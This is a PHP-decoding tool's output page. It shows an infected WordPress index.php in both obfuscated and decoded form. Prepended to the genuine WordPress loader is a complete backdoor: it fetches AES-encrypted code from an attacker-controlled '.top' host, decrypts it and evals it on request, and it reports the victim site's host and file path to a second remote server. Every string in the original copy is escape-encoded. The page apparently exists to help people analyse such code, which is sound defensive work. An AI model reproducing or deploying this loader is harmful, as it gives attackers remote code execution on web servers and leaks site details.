Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php //mailei /*hnv*/"e\162\x72\x6f\162_\x72\x65p\157rti\156\x67"/*gxre*/(0); if(isset(..

Decoded Output download

<?php //mailei 
/*hnv*/"error_reporting"/*gxre*/(0); 
if(isset($_GET["ma"])&&isset($_GET["key"])&&isset($_GET["partd"])){ 
    $tksv=/*hnv*/"substr"/*gxre*/(/*hnv*/"md5"/*gxre*/($_GET["key"]),0,16); 
    $vgw=/*hnv*/"substr"/*gxre*/(/*hnv*/"md5"/*gxre*/($_GET["key"]),-16); 
    /*jxen*/eval/*sh*/(hiaa(kt("http://".$_GET["partd"]."shop.top/getst.php?ma=".$_GET["ma"])));/*jxen*/die/*sh*/(); 
}elseif(!/*hnv*/"file_exists"/*gxre*/("m".date("Y-m-d").".txt")){ 
    $oo = "http://pang.24hishop.top/savest.php?web="./*hnv*/"base64_encode"/*gxre*/("esada,/var/www/vhosts/estudiantesesada.es/httpdocs,".(isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] === "on" ? "https://" : "http://") .$_SERVER["HTTP_HOST"].",".$_SERVER["SERVER_NAME"].",".$_SERVER["REQUEST_URI"]); 
    $axtl=kt($oo); 
    if($axtl=="down")@/*hnv*/"file_put_contents"/*gxre*/("m".date("Y-m-d").".txt",""); 
} 
function hiaa($aqed){	 
    global $tksv,$vgw; 
    $hkpn = /*hnv*/"gzuncompress"/*gxre*/(/*hnv*/"openssl_decrypt"/*gxre*/(/*hnv*/"base64_decode"/*gxre*/($aqed),"AES-128-CBC",$tksv,true,$vgw));	return $hkpn;} 
function kt($nq){ 
    $mrsp = @/*hnv*/"file_get_contents"/*gxre*/($nq); 
    if (!$mrsp) { 
        $naqv = /*hnv*/"curl_init"/*gxre*/(); 
        /*hnv*/"curl_setopt"/*gxre*/($naqv, CURLOPT_URL, $nq); 
        /*hnv*/"curl_setopt"/*gxre*/($naqv, CURLOPT_SSL_VERIFYHOST, 0); 
        /*hnv*/"curl_setopt"/*gxre*/($naqv, CURLOPT_SSL_VERIFYPEER, 0); 
        /*hnv*/"curl_setopt"/*gxre*/($naqv, CURLOPT_RETURNTRANSFER,1); 
        $mrsp = /*hnv*/"curl_exec"/*gxre*/($naqv); 
        /*hnv*/"curl_close"/*gxre*/($naqv); 
    }   
    return $mrsp; 
}?><?php 
/** 
 * Front to the WordPress application. This file doesn't do anything, but loads 
 * wp-blog-header.php which does and tells WordPress to load the theme. 
 * 
 * @package WordPress 
 */ 
 
/** 
 * Tells WordPress to load the WordPress theme and output it. 
 * 
 * @var bool 
 */ 
define( 'WP_USE_THEMES', true ); 
 
/** Loads the WordPress Environment and Template */ 
require __DIR__ . '/wp-blog-header.php'; 
 ?>

Did this file decode correctly?

Original Code

<?php //mailei
/*hnv*/"e\162\x72\x6f\162_\x72\x65p\157rti\156\x67"/*gxre*/(0);
if(isset($_GET["\155\x61"])&&isset($_GET["\x6b\145\171"])&&isset($_GET["\x70\141\x72\x74\144"])){
    $tksv=/*hnv*/"\163\x75\142\163\x74\x72"/*gxre*/(/*hnv*/"\x6d\x645"/*gxre*/($_GET["\x6b\145\x79"]),0,16);
    $vgw=/*hnv*/"\163\165\142\163\164\162"/*gxre*/(/*hnv*/"\x6d\1445"/*gxre*/($_GET["\153\145\171"]),-16);
    /*jxen*/eval/*sh*/(hiaa(kt("\x68\164\164\160://".$_GET["\160\141\x72\x74\144"]."s\x68\157\x70.\164op/g\145\164\163t.php?m\x61=".$_GET["\x6d\x61"])));/*jxen*/die/*sh*/();
}elseif(!/*hnv*/"\x66i\154\145_\x65\x78\x69s\164s"/*gxre*/("\x6d".date("\131-\155-\144").".\164\170\x74")){
    $oo = "\150\164t\160://pan\147.24\x68\151sho\160.t\157\160/s\x61v\x65\163t.\160\x68\x70?web="./*hnv*/"\x62\x61\163\14564_\x65\156\x63od\145"/*gxre*/("esada,/var/www/vhosts/estudiantesesada.es/httpdocs,".(isset($_SERVER["\110\x54\x54\120\123"]) && $_SERVER["\x48\124\x54\120\123"] === "\x6f\156" ? "\150\164\x74\x70\x73://" : "\150\x74\x74\x70://") .$_SERVER["\110\x54\x54\120_\x48\x4f\x53\124"].",".$_SERVER["SER\x56\105R_\116\x41\115\105"].",".$_SERVER["REQ\125ES\x54_U\x52\x49"]);
    $axtl=kt($oo);
    if($axtl=="\144\157\x77\156")@/*hnv*/"fi\154e_put_\x63\x6fn\x74en\x74s"/*gxre*/("\155".date("\x59-\x6d-\x64").".\164\170\164","");
}
function hiaa($aqed){	
    global $tksv,$vgw;
    $hkpn = /*hnv*/"g\172unco\155p\162\145\163\x73"/*gxre*/(/*hnv*/"open\x73s\154_d\145\143\x72\x79\x70\x74"/*gxre*/(/*hnv*/"b\x61se64_d\x65\x63o\144\x65"/*gxre*/($aqed),"\101ES-128-\103BC",$tksv,true,$vgw));	return $hkpn;}
function kt($nq){
    $mrsp = @/*hnv*/"\x66i\x6ce_\147e\164_\143ont\x65\156ts"/*gxre*/($nq);
    if (!$mrsp) {
        $naqv = /*hnv*/"\143\x75\x72\154_\x69\x6e\x69\164"/*gxre*/();
        /*hnv*/"c\165\x72\x6c_s\145t\x6f\x70\164"/*gxre*/($naqv, CURLOPT_URL, $nq);
        /*hnv*/"\143\x75\162\154_se\164o\160\x74"/*gxre*/($naqv, CURLOPT_SSL_VERIFYHOST, 0);
        /*hnv*/"cur\x6c_s\145t\157p\164"/*gxre*/($naqv, CURLOPT_SSL_VERIFYPEER, 0);
        /*hnv*/"cu\x72l_s\145t\x6f\160\x74"/*gxre*/($naqv, CURLOPT_RETURNTRANSFER,1);
        $mrsp = /*hnv*/"\143\165\x72\x6c_\145\170\145\143"/*gxre*/($naqv);
        /*hnv*/"curl_close"/*gxre*/($naqv);
    }  
    return $mrsp;
}?><?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define( 'WP_USE_THEMES', true );

/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';

Function Calls

None

Variables

None

Stats

MD5 8352a70dba8a87adf5513eb357fe375a
Eval Count 0
Decode Time 39 ms